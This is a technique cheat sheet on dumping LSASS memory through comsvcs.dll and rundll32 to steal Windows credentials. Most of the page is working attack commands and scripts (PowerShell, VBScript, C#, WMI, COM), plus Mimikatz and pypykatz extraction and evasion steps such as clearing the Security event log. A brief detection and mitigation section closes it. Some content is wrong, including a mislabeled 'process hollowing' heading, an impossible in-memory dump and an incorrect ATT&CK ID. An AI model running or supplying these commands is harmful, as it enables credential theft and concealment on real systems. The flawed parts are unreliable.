Comsvcs

Comsvcs.dll is a Windows system library that contains MiniDump functionality. It’s commonly leveraged to dump LSASS process memory and extract credentials without creating a new process or triggering common detections.

Overview

Comsvcs.dll exports functions that can be abused to dump LSASS memory. The DLL is part of Component Object Model (COM) infrastructure and is legitimately used by Windows services. By using rundll32.exe to call comsvcs functions, attackers can dump memory with reduced detection.

Basic Dumping

Standard rundll32 LSASS Dump

# Basic syntax: rundll32.exe comsvcs.dll MiniDump <PID> <output_file> full
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump 632 C:\temp\lsass.dmp full

# Get LSASS PID first (cmd)
tasklist /FI "IMAGENAME eq lsass.exe"

# Get LSASS PID (PowerShell)
$lsassPID = Get-Process lsass | Select-Object -ExpandProperty Id

Using rundll32 with Obfuscation

# Using indirect reference
rundll32.exe comsvcs.dll MiniDump $(Get-Process lsass).Id C:\temp\dump.bin full

# Using WMI to get LSASS PID
rundll32.exe comsvcs.dll MiniDump (Get-WmiObject Win32_Process -Filter "name='lsass.exe'").ProcessId C:\temp\lsass.dmp full

# Using System.Diagnostics
rundll32.exe comsvcs.dll MiniDump ([System.Diagnostics.Process]::GetProcessesByName('lsass')[0].Id) C:\temp\lsass.dmp full

Advanced Techniques

Memory Dump with Process Hollowing

# Create process dump with specific options
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump 632 C:\temp\output.dmp full 1

# Parameters:
# - full: includes all memory sections
# - 1: full dump mode

Dumping to Alternate Data Stream (ADS)

# Write dump to alternate data stream to hide from directory listing
rundll32.exe comsvcs.dll MiniDump 632 C:\temp\file.txt:dump.bin full

# Read ADS
Get-Content -Path C:\temp\file.txt -Stream dump.bin -Raw | Out-File C:\temp\extracted.dmp -Encoding Byte

Using VBScript for Execution

' Create shell object and execute rundll32
Set objShell = CreateObject("WScript.Shell")
Set objWMI = GetObject("winmgmts:")

' Get LSASS PID
Set colProcess = objWMI.ExecQuery("Select ProcessId From Win32_Process Where Name='lsass.exe'")
For Each objProcess In colProcess
    strPID = objProcess.ProcessId
Next

' Execute dump
objShell.Run "rundll32.exe comsvcs.dll MiniDump " & strPID & " C:\temp\lsass.dmp full"

Using C# for Dumping

using System;
using System.Diagnostics;

class ComsvcsExploit
{
    static void Main()
    {
        // Get LSASS process
        Process[] processes = Process.GetProcessesByName("lsass");
        if (processes.Length > 0)
        {
            int lsassPID = processes[0].Id;

            // Execute rundll32 with comsvcs
            ProcessStartInfo psi = new ProcessStartInfo
            {
                FileName = "rundll32.exe",
                Arguments = $"comsvcs.dll MiniDump {lsassPID} C:\\temp\\lsass.dmp full",
                CreateNoWindow = true,
                UseShellExecute = false
            };

            Process proc = Process.Start(psi);
            proc.WaitForExit();
        }
    }
}

Defense Evasion

Living off the Land Variants

# Using System32 path bypass
C:\Windows\SysWOW64\rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <PID> output.dmp full

# Using UNC path
rundll32.exe \\127.0.0.1\C$\Windows\System32\comsvcs.dll MiniDump 632 output.dmp full

# Using alternative extensions
copy C:\Windows\System32\comsvcs.dll C:\temp\comsvcs.dat
rundll32.exe C:\temp\comsvcs.dat MiniDump 632 output.dmp full

Execution via WMI

# Using WMI to execute rundll32
$process = Get-WmiObject Win32_Process -Filter "name='lsass.exe'"
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "rundll32.exe comsvcs.dll MiniDump $($process.ProcessId) C:\temp\dump.dmp full"

Execution via COM Interface

# Using COM for execution (less common detection)
$com = New-Object -ComObject "Shell.Application"
$com.ShellExecute("rundll32.exe", "comsvcs.dll MiniDump 632 C:\temp\lsass.dmp full")

Credential Extraction

Parsing Dump Files with Mimikatz

# Using Mimikatz to parse dumped LSASS memory
mimikatz.exe "sekurlsa::minidump C:\temp\lsass.dmp" "sekurlsa::logonpasswords" "exit"

# Full extraction pipeline
mimikatz.exe "sekurlsa::minidump C:\temp\lsass.dmp" "sekurlsa::logonpasswords" "token::elevate" "vault::cred /patch" "exit"

Using Pypykatz (Linux parsing)

# Parse Windows LSASS dump on Linux
pypykatz lsa minidump lsass.dmp

# Export to JSON
pypykatz lsa minidump lsass.dmp -o json > creds.json

# Parse with detailed output
pypykatz lsa minidump lsass.dmp -v

Detection Evasion

Reducing Detectable Artifacts

# Dump to memory and avoid disk writes
$bytes = New-Object System.Byte[] (1000000)
rundll32.exe comsvcs.dll MiniDump 632 $bytes full

# Use temp folder less commonly monitored
rundll32.exe comsvcs.dll MiniDump 632 C:\ProgramData\dump.bin full

# Clear Event Log after dump
Clear-EventLog -LogName Security

Time-based Execution

# Schedule dump during off-hours
# Run at 2 AM
$trigger = New-ScheduledTaskTrigger -At 2:00AM -Daily
$action = New-ScheduledTaskAction -Execute "rundll32.exe" -Argument "comsvcs.dll MiniDump 632 C:\temp\dump.dmp full"
Register-ScheduledTask -TaskName "ComsvcsTask" -Trigger $trigger -Action $action

Defensive Measures

EDR/AV Detection Signatures

Detection typically focuses on:

• rundll32.exe calling comsvcs.dll MiniDump
• LSASS memory access patterns
• Dump files created in unusual locations
• Registry monitoring for persistence attempts

Windows Defender/Defender for Endpoint

# Monitor for comsvcs exploitation
wevtutil qe Security /q:"*[System[(EventID=4688)]] and *[EventData[Data[@Name='CommandLine'] and (contains(Data,'comsvcs') or contains(Data,'MiniDump'))]]"

Sysmon Detection Rules

<!-- Detect rundll32 with comsvcs -->
<Sysmon schemaversion="4.22">
  <EventFiltering>
    <ProcessCreate onmatch="include">
      <Image condition="image">rundll32.exe</Image>
      <CommandLine condition="contains">comsvcs</CommandLine>
    </ProcessCreate>
  </EventFiltering>
</Sysmon>

Mitigation Strategies

Defensive Techniques

• LSA Protection: Enable Credential Guard to protect LSASS memory
• Process Access Auditing: Monitor unusual process access to lsass.exe
• Disable rundll32: Restrict or monitor rundll32.exe execution
• Application Control: Use AppLocker/WDAC to restrict DLL execution

Windows Defender Exploit Guard

# Enable controlled folder access to protect temp locations
Set-MpPreference -EnableControlledFolderAccess Enabled

# Exclude LSASS process from certain operations
Set-MpPreference -DisableRealtimeMonitoring $false

Alternative Tools

• Procdump (Microsoft Sysinternals): Legitimate dump tool
• nanodump: Reflective DLL that dumps LSASS
• Handle: Alternative memory access method
• MalMemGames: Memory dumping bypass techniques

Related Techniques

• LSASS Memory Dumping: T1110.001
• Credential Dumping: T1003
• Signed Binary Proxy Execution: T1218
• Living Off The Land Binaries (LOLBins): Execution via comsvcs

References

• Mitre ATT&CK - Credential Dumping
• Mitre ATT&CK - Signed Binary Proxy Execution
• Living off the Land Binaries
• Comsvcs.dll Abuse

---

Last updated: 2026-03-30